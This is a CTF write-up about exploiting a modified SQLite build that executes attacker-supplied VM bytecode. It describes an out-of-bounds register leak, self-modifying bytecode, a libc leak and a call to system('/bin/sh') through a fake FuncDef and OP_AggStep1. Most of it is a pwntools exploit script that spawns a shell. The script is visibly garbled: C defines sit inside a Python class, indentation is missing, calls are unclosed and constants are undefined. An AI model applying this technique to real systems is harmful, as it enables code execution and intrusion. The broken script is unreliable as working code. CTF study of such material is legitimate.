
# WARNING: LLM Polished Content, stop reading immediately if you are allergy to text with LLM-vibe.

This write-up details the solution to a Capture the Flag (CTF) challenge where we could execute arbitrary SQLite bytecode.

**What is SQLite Bytecode?**

SQLite bytecode is a set of instructions used by the SQLite database engine's virtual machine. When you execute an SQL query, SQLite compiles it into this bytecode, which is then interpreted to perform the database operations. This bytecode defines low-level actions like opening tables, reading data, comparing values, and performing calculations, all within the context of the SQLite database.

**Challenge Overview**

The challenge provided a modified SQLite environment where we could inject our own bytecode. Although a new bytecode instruction `OP_Pack` was added, we did not utilize it in our solution.

**Our Approach**

Our strategy closely followed the methodology outlined in this blog post: [https://gold3nboy.github.io/blog/posts/irisctf/](https://gold3nboy.github.io/blog/posts/irisctf/). However, a key difference in our challenge was the limitation of executing only one bytecode sequence. This constraint required us to leak a memory address and then write it back into our bytecode program as an immediate value for subsequent use.

**Exploiting Fixed Offset on the Heap**

We exploited the fact that `stmt->amem` (which holds the SQLite virtual machine's registers) and `stmt->aOp` (which stores the bytecode instructions) are located at a fixed offset from each other on the heap. This relationship was crucial for modifying our own bytecode on the fly.

**Detailed Solution Steps**

1. **Initial Pointer Leak:** We used out-of-bounds register access (similar to the referenced writeup) to leak an initial pointer from the program's memory.

2. **Leaking libc Address:** We leveraged the `OP_INT64` instruction to dereference the leaked pointer, effectively reading a value from a known memory location. By targeting a pointer within the `libsqlite3` library, we obtained the base address of `libc`.

3. **Calling system() - The Challenge:** The referenced writeup mentioned attempting to use `OP_Function` to call `system()`. However, they encountered an issue where `OP_Function` corrupted the first 8 bytes of the argument passed to `system()`, making it unusable. They opted for a one-gadget instead, but we did not have a suitable one-gadget in our environment.

4. **Our Fix - Using OP_AggStep1:** We discovered that `OP_AggStep1`, designed for aggregate functions, behaves very similarly to `OP_Function` but without the undesirable side effect of modifying the input argument. This allowed us to successfully call `system()`.

**Solution Script Explanation**

The provided Python script automates the exploit:

from pwn import remote, process, context, gdb, flat, args

import enum
import struct

context.log_level = "debug"
context.arch = "amd64"

BASE = 0x2000000000
TAIL = 0xE0 * 24

class P4(enum.IntEnum):
** Allowed values of VdbeOp.p4type
#define P4_NOTUSED 0 /* The P4 parameter is not used */
#define P4_TRANSIENT 0 /* P4 is a pointer to a transient string */
#define P4_STATIC (-1) /* Pointer to a static string */
#define P4_COLLSEQ (-2) /* P4 is a pointer to a CollSeq structure */
#define P4_INT32 (-3) /* P4 is a 32-bit signed integer */
#define P4_SUBPROGRAM (-4) /* P4 is a pointer to a SubProgram structure */
#define P4_TABLE (-5) /* P4 is a pointer to a Table structure */
/* Above do not own any resources. Must free those below */
#define P4_FREE_IF_LE (-6)
#define P4_DYNAMIC (-6) /* Pointer to memory from sqliteMalloc() */
#define P4_FUNCDEF (-7) /* P4 is a pointer to a FuncDef structure */
#define P4_KEYINFO (-8) /* P4 is a pointer to a KeyInfo structure */
#define P4_EXPR (-9) /* P4 is a pointer to an Expr tree */
#define P4_MEM (-10) /* P4 is a pointer to a Mem* structure */
#define P4_VTAB (-11) /* P4 is a pointer to an sqlite3_vtab structure */
#define P4_REAL (-12) /* P4 is a 64-bit floating point value */
#define P4_INT64 (-13) /* P4 is a 64-bit signed integer */
#define P4_INTARRAY (-14) /* P4 is a vector of 32-bit integers */
#define P4_FUNCCTX (-15) /* P4 is a pointer to an sqlite3_context object */
#define P4_TABLEREF (-16) /* Like P4_TABLE, but reference counted */
#define P4_SUBRTNSIG (-17) /* P4 is a SubrtnSig pointer */

INT32 = -3
TABLE = -5
EXPR = -9
MEM = -10
VTAB = -11
REAL = -12
INT64 = -13

class OP(enum.IntEnum):
Savepoint = 0
AutoCommit = 1
Transaction = 2
Checkpoint = 3
JournalMode = 4
Vacuum = 5
VFilter = 6
VUpdate = 7
Init = 8
Goto = 9
Gosub = 10
InitCoroutine = 11
Yield = 12
MustBeInt = 13
Jump = 14
Once = 15
If = 16
IfNot = 17
IsType = 18
Not = 19
IfNullRow = 20
SeekLT = 21
SeekLE = 22
SeekGE = 23
SeekGT = 24
IfNotOpen = 25
IfNoHope = 26
NoConflict = 27
NotFound = 28
Found = 29
SeekRowid = 30
NotExists = 31
Last = 32
IfSizeBetween = 33
SorterSort = 34
Sort = 35
Rewind = 36
SorterNext = 37
Prev = 38
Next = 39
IdxLE = 40
IdxGT = 41
IdxLT = 42
Or = 43
And = 44
IdxGE = 45
RowSetRead = 46
RowSetTest = 47
Program = 48
FkIfZero = 49
IfPos = 50
IsNull = 51
NotNull = 52
Ne = 53
Eq = 54
Gt = 55
Le = 56
Lt = 57
Ge = 58
ElseEq = 59
IfNotZero = 60
DecrJumpZero = 61
IncrVacuum = 62
VNext = 63
Filter = 64
PureFunc = 65
Function = 66
Return = 67
EndCoroutine = 68
HaltIfNull = 69
Halt = 70
Integer = 71
Int64 = 72
String = 73
BeginSubrtn = 74
Null = 75
SoftNull = 76
Blob = 77
Variable = 78
Move = 79
Copy = 80
SCopy = 81
IntCopy = 82
FkCheck = 83
ResultRow = 84
CollSeq = 85
AddImm = 86
RealAffinity = 87
Cast = 88
Permutation = 89
Compare = 90
IsTrue = 91
ZeroOrNull = 92
Offset = 93
Column = 94
TypeCheck = 95
Affinity = 96
MakeRecord = 97
Count = 98
ReadCookie = 99
SetCookie = 100
ReopenIdx = 101
OpenRead = 102
BitAnd = 103
BitOr = 104
ShiftLeft = 105
ShiftRight = 106
Add = 107
Subtract = 108
Multiply = 109
Divide = 110
Remainder = 111
Concat = 112
OpenWrite = 113
OpenDup = 114
BitNot = 115
OpenAutoindex = 116
OpenEphemeral = 117
String8 = 118
SorterOpen = 119
SequenceTest = 120
OpenPseudo = 121
Close = 122
ColumnsUsed = 123
SeekScan = 124
SeekHit = 125
Sequence = 126
NewRowid = 127
Insert = 128
RowCell = 129
Delete = 130
ResetCount = 131
SorterCompare = 132
SorterData = 133
RowData = 134
Rowid = 135
NullRow = 136
SeekEnd = 137
IdxInsert = 138
SorterInsert = 139
IdxDelete = 140
DeferredSeek = 141
IdxRowid = 142
FinishSeek = 143
Destroy = 144
Clear = 145
ResetSorter = 146
CreateBtree = 147
SqlExec = 148
ParseSchema = 149
LoadAnalysis = 150
DropTable = 151
DropIndex = 152
DropTrigger = 153
Real = 154
IntegrityCk = 155
RowSetAdd = 156
Param = 157
FkCounter = 158
MemMax = 159
OffsetLimit = 160
AggInverse = 161
AggStep = 162
AggStep1 = 163
AggValue = 164
AggFinal = 165
Expire = 166
CursorLock = 167
CursorUnlock = 168
TableLock = 169
VBegin = 170
VCreate = 171
VDestroy = 172
VOpen = 173
VCheck = 174
VInitIn = 175
VColumn = 176
VRename = 177
Pagecount = 178
MaxPgcnt = 179
ClrSubtype = 180
GetSubtype = 181
SetSubtype = 182
FilterAdd = 183
Trace = 184
CursorHint = 185
ReleaseReg = 186
Noop = 187
Explain = 188
Abortable = 189

def op(opcode: OP, p1=0, p2=0, p3=0, p4type: P4 = P4.NOTUSED, p4=0, p5=0):
assert -(2**31) <= p1 < 2**31
assert -(2**31) <= p2 < 2**31
assert -(2**31) <= p3 < 2**31
assert 0 <= p4 < 2**64
assert 0 <= p5 < 2**16
return struct.pack("<BbHiiiQ", int(opcode), int(p4type), p5, p1, p2, p3, p4)

def read8(dst, addr):
return op(OP.Int64, p1=dst, p4type=P4.INT64, p4=addr)

def intcopy(dst, src):
return op(OP.IntCopy, p2=dst, p1=src)

def add_imm(dst, value):
return op(OP.AddImm, p1=dst, p2=value)

def debug():
return op(OP.Pagecount)

aMem = 0x558e2f795470,
apArg = 0x558e2f795470,
apCsr = 0x558e2f795470,
aVar = 0x558e2f795470,
aOp = 0x558e2f7ae350,


def compute_aop_overwrite_offset(target_pc):
# int_copy writes to value+0, then changes a u16 at +20
# we want to overwrite p4 at op+16; p3 of the next instruction will be trashed
# ... which is totally fine
offset_amem = (AMEM_TO_AOP + 55) // 56
cur = offset_amem * 56 - AMEM_TO_AOP
while cur % 24 != 16:
cur += 56
offset_amem += 1
actual_pc = cur // 24
while actual_pc < target_pc:
offset_amem += 3
actual_pc += 7
return offset_amem, actual_pc

amem_offset_to_op_int64, op_int64_pc = compute_aop_overwrite_offset(

payload = [
intcopy(1, -799),
# -827442 - 61440: to libsqlite3 base; +0x103000: .got getenv
add_imm(1, -827442 - 61440 + 0x103000),
intcopy(amem_offset_to_op_int64, 1),
assert len(payload) < op_int64_pc
while len(payload) < op_int64_pc:
payload.append(read8(0, 0x6161616161616161))

amem_offset_to_op_function, op_function_pc = compute_aop_overwrite_offset(
amem_offset_to_end_of_payload = amem_offset_to_op_function + 2

payload += [
# system() in 0 now
# Make it address to call
intcopy(amem_offset_to_end_of_payload, 0), # system
# op(OP.Integer, p2=amem_offset_to_end_of_payload, p1=0x41414141),
# ----------------------
intcopy(1, 2),
add_imm(1, -752),
intcopy(0, 1),
# 24: offsetof(xSFunc, FuncDef)
add_imm(0, HEAP_BASE_TO_AMEM + amem_offset_to_end_of_payload * 56 - 24),
intcopy(amem_offset_to_end_of_payload + 1, 0),
intcopy(0, 1),
add_imm(0, HEAP_BASE_TO_AMEM + (amem_offset_to_end_of_payload + 1) * 56 - 8),
intcopy(amem_offset_to_op_function, 0),
# debug(),

assert len(payload) < op_function_pc
while len(payload) < op_function_pc:
payload += [
op(OP.AggStep1, p4type=P4.FUNCDEF, p4=0x4242424242424242),
payload = b"".join(payload)
tail = flat([0x4141414141414141])
payload = flat(
{0: payload, 1928: b"/bin/sh\x00", TAIL: tail},
length=0x100 * 24 - 1,

# r = process("./chall", env={"LD_LIBRARY_PATH": "."})
if args.REMOTE:
r = remote(args.HOST, args.PORT)
r = process("./chall")
r.sendlineafter(b"size> ", str(len(payload)).encode())
gdbscript = """
# b sqlite3VdbeExec
b *(sqlite3VdbeExec+0x23f3)
b *(sqlite3VdbeExec+0x12bc)
if not args.REMOTE:
gdb.attach(r, gdbscript)
r.sendafter(b"your bytecode> ", payload)

* **Constants and Enums:** Defines constants like memory addresses and enumerations (`P4` and `OP`) for SQLite bytecode parameter types and opcodes, respectively. These improve code readability and maintainability.
* **Helper Functions:** `op()`, `read8()`, `intcopy()`, `add_imm()`, and `debug()` create bytecode instructions.
* **Heap and Offset Calculations:** Computes offsets between `amem`, `aOp`, and relevant function addresses within `libc` (`getenv` and `system`).
* **`compute_aop_overwrite_offset()`:** This function is the core of our bytecode self-modification. It calculates the precise register index needed to overwrite a specific instruction's `p4` field (which often holds a pointer or immediate value).
* **Payload Construction (Stage 1):**
* Calculates the address of the `getenv` function in the Global Offset Table (GOT) of `libsqlite3`.
* Uses `intcopy` and `add_imm` to place this address into the correct `amem` register so that in the next step we can overwrite an instruction's `p4` field with this address.
* Appends `read8(0, 0x6161616161616161)` to read 8 bytes starting from a placeholder address. This instruction will be overwritten in the next step.
* **Payload Construction (Stage 2):**
* Calculates the address of `system` using the previously leaked `getenv` address.
* Constructs a fake `FuncDef` structure (used by `OP_Function` and `OP_AggStep1`) that points to `system`.
* Constructs a fake `sqlite3_context` structure that points to the fake `FuncDef`.
* Places the address of "/bin/sh" in the appropriate location for `system` to use.
* Uses `OP_AggStep1` to call `system` with the crafted structures.
* **Final Payload Assembly:** Combines the generated bytecode with padding and the "/bin/sh" string to create the final payload.
* **Interaction:** Sends the payload to the challenge server and establishes an interactive shell.